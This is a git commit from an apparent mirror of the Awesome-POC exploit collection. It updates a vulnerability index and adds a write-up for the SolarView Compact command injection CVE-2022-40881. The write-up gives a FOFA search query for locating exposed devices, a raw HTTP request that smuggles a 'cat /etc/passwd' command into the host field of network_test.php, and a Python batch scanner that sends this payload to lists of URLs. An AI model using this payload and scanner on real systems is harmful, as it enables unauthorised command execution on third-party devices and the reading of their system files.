mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
更新漏洞
This commit is contained in:
Threekiii
parent
9a378cf10f
commit
1ee6a7dd11
@ -273,6 +273,7 @@
|
||||
* ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440
|
||||
* ShowDoc PageController.class.php 任意文件上传漏洞
|
||||
* ShowDoc 前台文件上传漏洞
|
||||
* SolarView Compact 命令注入漏洞 CVE-2022-40881
|
||||
* SonarQube search_projects 项目信息泄露漏洞
|
||||
* SonarQube values 信息泄露漏洞 CVE-2020-27986
|
||||
* SpiderFlow save 远程命令执行漏洞
|
||||
@ -431,7 +432,7 @@
|
||||
* JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
|
||||
* Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861
|
||||
* Jenkins CI 远程代码执行漏洞 CVE-2017-1000353
|
||||
* Jenkins script 远程命令执行漏洞
|
||||
* Jenkins script 未授权远程命令执行漏洞
|
||||
* Jenkins XStream 反序列化漏洞 CVE-2016-0792
|
||||
* Jenkins 远程代码执行漏洞 CVE-2015-8103
|
||||
* muhttpd 任意文件读取漏洞 CVE-2022-31793
|
||||
@ -494,6 +495,7 @@
|
||||
* Franklin Fueling Systems tsaupload.cgi 任意文件读取漏洞 CVE-2021-46417
|
||||
* Git for Visual Studio远程执行代码漏洞 CVE-2021-21300
|
||||
* Git-LFS 远程命令执行漏洞 CVE-2020-27955
|
||||
* Hashicorp Consul Service API远程命令执行漏洞
|
||||
* Microsoft Exchange Server 远程执行代码漏洞 CVE-2020-17083
|
||||
* Microsoft Exchange SSRF漏洞 CVE-2021-26885
|
||||
* Microsoft Exchange 信息泄露漏洞 CVE-2020-17143
|
||||
|
||||
82
Web应用漏洞/SolarView Compact 命令注入漏洞 CVE-2022-40881.md
Normal file
82
Web应用漏洞/SolarView Compact 命令注入漏洞 CVE-2022-40881.md
Normal file
@ -0,0 +1,82 @@
|
||||
# SolarView Compact 命令注入漏洞 CVE-2022-40881
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Contec SolarView Compact是日本Contec公司的一个应用系统。提供光伏发电测量系统。Contec SolarView Compact 6.00版本存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令注入攻击。
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
SolarView Compact 6.00
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
body="SolarView Compact" && title=="Top"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
发送数据包:
|
||||
|
||||
```
|
||||
POST /cgi-bin/network_test.php HTTP/1.1
|
||||
Host: x.x.x.x
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.97 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 44
|
||||
|
||||
host=%0acat${IFS}/etc/passwd%0a&command=ping
|
||||
```
|
||||
|
||||
## 漏洞POC
|
||||
|
||||
```python
|
||||
import sys
|
||||
import requests
|
||||
import argparse
|
||||
|
||||
def poc_scan(url):
|
||||
try:
|
||||
url = url + "/network_test.php"
|
||||
response = requests.post(url,data = "host=%0acat${IFS}/etc/passwd%0a&command=ping",timeout=2)
|
||||
if response.status_code == 200:
|
||||
print(f"\033[92m[+] {url} is vulnerable!\033[0m")
|
||||
else:
|
||||
print(f"\033[31m[-] {url} is not vulnerable!\033[0m")
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def open_file(filename):
|
||||
with open(filename, 'r', encoding='utf-8') as f:
|
||||
filecontent = f.read()
|
||||
return filecontent
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument("-u", "--url")
|
||||
parser.add_argument("-f", "--file")
|
||||
args = parser.parse_args()
|
||||
url = args.url
|
||||
filename = args.file
|
||||
|
||||
if sys.argv[1] == '-u':
|
||||
poc_scan(url)
|
||||
else:
|
||||
filecontent = open_file(filename)
|
||||
filecontent = filecontent.split("\n")
|
||||
for i in filecontent:
|
||||
poc_scan(i)
|
||||
```
|
||||
|
||||
## 修复建议
|
||||
|
||||
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.contec.com/products-services/environmental-monitoring/solarview/
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user